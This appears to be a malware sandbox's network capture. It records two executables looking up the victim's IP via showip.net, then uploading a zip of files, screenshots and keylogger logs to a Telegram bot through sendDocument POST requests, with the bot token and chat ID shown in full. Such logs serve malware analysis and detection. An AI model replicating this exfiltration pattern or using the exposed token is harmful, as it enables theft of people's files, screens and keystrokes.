Nov 27, 2024 20:46:53.005012989 CET | 57113 | 53 | 192.168.2.5 | 1.1.1.1
Nov 27, 2024 20:46:53.232523918 CET | 53 | 57113 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 20:46:29.785741091 CET | 192.168.2.5 | 1.1.1.1 | 0xbae5 | Standard query (0) | showip.net | A (IP address) | IN (0x0001) | false
Nov 27, 2024 20:46:37.921238899 CET | 192.168.2.5 | 1.1.1.1 | 0xcfa3 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 27, 2024 20:46:53.005012989 CET | 192.168.2.5 | 1.1.1.1 | 0x6ba | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 20:46:30.347095013 CET | 1.1.1.1 | 192.168.2.5 | 0xbae5 | No error (0) | showip.net | | 162.55.60.2 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 20:46:38.072345972 CET | 1.1.1.1 | 192.168.2.5 | 0xcfa3 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 20:46:53.232523918 CET | 1.1.1.1 | 192.168.2.5 | 0x6ba | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false

                                                                                      • api.telegram.org
                                                                                      • showip.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49740 | 162.55.60.2 | 80 | 4848 | C:\Users\user\AppData\Roaming\XgbXowhljC.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 20:46:30.479710102 CET | 58 | OUT | GET / HTTP/1.1
User-Agent: Project1
Host: showip.net
Nov 27, 2024 20:46:31.764827967 CET | 1236 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: *
Access-Control-Allow-Origin: *
Content-Type: text/html;charset=utf-8
Date: Wed, 27 Nov 2024 19:46:31 GMT
Server: Caddy
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49749 | 162.55.60.2 | 80 | 4676 | C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 20:46:34.994776964 CET | 58 | OUT | GET / HTTP/1.1
User-Agent: Project1
Host: showip.net
Nov 27, 2024 20:46:36.371814013 CET | 1236 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: *
Access-Control-Allow-Origin: *
Content-Type: text/html;charset=utf-8
Date: Wed, 27 Nov 2024 19:46:36 GMT
Server: Caddy
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49758 | 149.154.167.220 | 443 | 4848 | C:\Users\user\AppData\Roaming\XgbXowhljC.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-27 19:46:39 UTC | 557 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
Accept-Language: en-ch
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: api.telegram.org
Content-Length: 18469
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-27 19:46:39 UTC | 16355 | OUT | Data Ascii:
--3fbd04f5-b1ed-4060-99b9-fca7ff59c113
Content-Disposition: form-data; name="document"; filename="Files.zip"
Content-Type: application/octet-stream

PK%JDWFiles/AFWAAFRXKO.docxIr@!D 1[TwVI5D&t
2024-11-27 19:46:40 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 27 Nov 2024 19:46:40 GMT
Content-Type: application/json
Content-Length: 543
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-27 19:46:40 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":3543,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736800,"document":{"file_name":"File


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      1    192.168.2.5    49786    149.154.167.220    443    4848    C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      2024-11-27 19:46:53 UTC    559    OUT    POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:46:53 UTC    16355    OUT
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotOlMgWEEg.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:47:00 UTC    388    IN    HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:46:59 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 553
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      2    192.168.2.5    49788    149.154.167.220    443    4676    C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      2024-11-27 19:46:54 UTC    559    OUT    POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:46:54 UTC    16355    OUT
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotSRwpxPBG.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:47:05 UTC    388    IN    HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:04 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 553
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      3    192.168.2.5    49794    149.154.167.220    443    4848    C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      2024-11-27 19:47:02 UTC    556    OUT    POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 2812
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:02 UTC    2812    OUT
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataCRIBJVmC.txt"Content-Type: application/octet-stream[14:46:27]<<Program Manager>>[14:46:27]<<Program Manager>>[14:46:28]<<Program Mana
                                                                                      2024-11-27 19:47:05 UTC    388    IN    HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:05 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:47:05 UTC    547    IN
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":3546,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736825,"document":{"file_name":"KeyD


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      4 | 192.168.2.5 | 49795 | 149.154.167.220 | 443 | 4676 | C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-11-27 19:47:06 UTC | 556 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 4132
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:06 UTC | 4132 | OUT | Data Ascii:
                                                                                      --3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Content-Disposition: form-data; name="document"; filename="KeyDataYvpxkkPQ.txt"
                                                                                      Content-Type: application/octet-stream
                                                                                      [14:46:27]<<Program Manager>>
                                                                                      [14:46:27]<<Program Manager>>
                                                                                      [14:46:27]<<Program Mana
                                                                                      2024-11-27 19:47:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:07 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:47:07 UTC | 547 | IN | Data Ascii: {"ok":true,"result":{"message_id":3547,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736827,"document":{"file_name":"KeyD


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      5 | 192.168.2.5 | 49798 | 149.154.167.220 | 443 | 4848 | C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-11-27 19:47:17 UTC | 559 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:17 UTC | 16355 | OUT | Data Ascii:
                                                                                      --3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Content-Disposition: form-data; name="document"; filename="ScreenshotYpJRkxJH.BMP"
                                                                                      Content-Type: application/octet-stream
                                                                                      BM6<6(<$$######$$$$
                                                                                      2024-11-27 19:47:41 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:41 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.5 | 49799 | 149.154.167.220 | 443 | 4676 | C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-11-27 19:47:18 UTC | 559 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:18 UTC | 16355 | OUT | Data Ascii:
                                                                                      --3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Content-Disposition: form-data; name="document"; filename="ScreenshotJfvZtTFo.BMP"
                                                                                      Content-Type: application/octet-stream
                                                                                      BM6<6(<$$######$$$$
                                                                                      2024-11-27 19:47:50 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:50 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.5 | 49802 | 149.154.167.220 | 443 | 4848 | C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-11-27 19:47:48 UTC | 556 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 2449
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:48 UTC | 2449 | OUT | Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatawIMKYJdN.txt"Content-Type: application/octet-stream[14:47:04]<<Program Manager>>[14:47:04]<<Program Manager>>[14:47:04]<<Program Mana
                                                                                      2024-11-27 19:47:50 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:50 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:47:50 UTC | 547 | IN | Data Ascii: {"ok":true,"result":{"message_id":3549,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736870,"document":{"file_name":"KeyD


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      8 | 192.168.2.5 | 49803 | 149.154.167.220 | 443 | 4676 | C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-11-27 19:47:52 UTC | 556 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 2515
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:52 UTC | 2515 | OUT | Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataMIfwfgeD.txt"Content-Type: application/octet-stream[14:47:06]<<Program Manager>>[14:47:06]<<Program Manager>>[14:47:06]<<Program Mana
                                                                                      2024-11-27 19:47:52 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:52 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:47:52 UTC | 547 | IN | Data Ascii: {"ok":true,"result":{"message_id":3551,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736872,"document":{"file_name":"KeyD


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      9 | 192.168.2.5 | 49805 | 149.154.167.220 | 443 | 4848 | C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-11-27 19:47:57 UTC | 559 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:57 UTC | 16355 | OUT | Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotnEqzxdUQ.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:48:15 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:48:15 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      10 | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | 4676 | C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-11-27 19:48:00 UTC | 559 | OUT | POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:48:00 UTC | 16355 | OUT | Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotyrLlvEdl.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:48:00 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
